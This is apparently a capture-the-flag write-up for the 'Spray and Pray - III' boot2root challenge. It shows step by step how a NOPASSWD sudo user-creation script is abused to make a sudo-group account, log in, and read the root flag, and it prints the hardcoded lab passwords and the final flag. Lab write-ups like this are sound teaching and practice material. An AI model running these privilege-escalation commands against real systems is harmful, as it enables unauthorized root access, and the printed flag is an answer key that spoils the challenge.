N
Back to writeup archive
LIGA CTF 2026 (Week 2 Boot2Root)

Spray and Pray - III

Escalate to root on the same box as Parts I/II. niki has NOPASSWD sudo on a writable user-creation script that adds users to the sudo group.

Boot2RootMarkdown + PDFEasysolved1 minread·237words
route
/TryN3rr0r/writeups/liga-ctf-2026-week-2-boot2root/spray-and-pray-iii
archive index
4 / 16
read mode
parsed markdown
Writeup loaded.

Spray and Pray - III

challenge brief
target profile, scoring, and execution stack
verified solve
target
192.168.1.20
category
Boot2Root
points
467
difficulty
Medium
flag format
OWASPKL{xxx}
tools used
nmapsshsshpasssudogetent
final flag
OWASPKL{05400e69198b6036bc1c05302435648e}
reveal and copy from section 5
PDF evidence frame 01

1. Challenge Overview

Escalate to root on the same box as Parts I/II. niki has NOPASSWD sudo on a writable user-creation script that adds users to the sudo group.

2. Initial Reconnaissance

2.1 Enumerate niki sudo rights + the script

bash1 lines
1sshpass -p 'abel_0411@weekndbuk1tj4lil' ssh -o StrictHostKeyChecking=no niki@192.168.1.20 "sudo -l; echo '---'; cat /home/niki/Downloads/gen_user.sh"
bash9 lines
1User niki may run the following commands on spraynpray:2    (ALL) NOPASSWD: /home/niki/Downloads/gen_user.sh3---4#!/bin/bash5USERNAME=$16PASSWORD=$27useradd -m -s /bin/bash "$USERNAME"8echo "$USERNAME:$PASSWORD" | chpasswd9usermod -aG sudo "$USERNAME"
PDF evidence frame 02

3. Analysis / Forensics Path

3.1 Identify the privesc

The sudo-allowed script runs as root and creates an attacker-controlled user in the sudo group — a direct path to root.

4. Exploitation / Recovery

4.1 Create a sudo user via the script

bash1 lines
1sshpass -p 'abel_0411@weekndbuk1tj4lil' ssh -o StrictHostKeyChecking=no niki@192.168.1.20 "sudo /home/niki/Downloads/gen_user.sh sp3root0164 'Sp3Root!2026'; grep '^sp3root0164:' /etc/passwd; getent group sudo"
bash2 lines
1sp3root0164:x:1009:1009::/home/sp3root0164:/bin/bash2sudo:x:27:spraynpray,jebat,ctfroot,sp3root0164

4.2 Log in as the new user, hunt the flag in /root, then read it

bash1 lines
1sshpass -p 'Sp3Root!2026' ssh -o StrictHostKeyChecking=no sp3root0164@192.168.1.20 "echo 'Sp3Root!2026' | sudo -S id; echo '--- ls /root ---'; echo 'Sp3Root!2026' | sudo -S ls -la /root; echo '--- grep flag ---'; echo 'Sp3Root!2026' | sudo -S grep -Rns 'OWASPKL{' /root 2>/dev/null; echo '--- read ---'; echo 'Sp3Root!2026' | sudo -S cat /root/proof.txt"
bash11 lines
1uid=0(root) gid=0(root) groups=0(root)2--- ls /root ---3drwx------  6 root root 4096 May 23 21:48 .4-rw-r--r--  1 root root  132 Apr 20 16:46 .profile5drwx------  2 root root 4096 Apr 23 08:43 .ssh6-rw-r--r--  1 root root   42 May 23 20:13 proof.txt7drwxr-xr-x  3 root root 4096 May 23 19:22 rockyou8--- grep flag ---9/root/proof.txt:1:OWASPKL{05400e69198b6036bc1c05302435648e}10--- read ---11OWASPKL{05400e69198b6036bc1c05302435648e}

> Re-validated live on 2026-05-31 via Kali (192.168.1.10): niki retains NOPASSWD on gen_user.sh; the created sudo user listed /root (showing proof.txt), grep confirmed the flag pattern, and cat /root/proof.txt -> flag above.

PDF evidence frame 03

5. Flag

captured flag
OWASPKL{05400e69198b6036bc1c05302435648e}

6. Summary of Approach & Key Takeaways

Logged in as niki (Part II creds).

sudo -l showed NOPASSWD on gen_user.sh.

Script creates sudo users with attacker-chosen passwords.

Created sp3root0164 and escalated to root.

Read /root/proof.txt.

A sudo-runnable script that creates privileged accounts is equivalent to full root.

Always inspect the contents of any NOPASSWD-allowed script.

PDF evidence frame 04
PDF evidence frame 05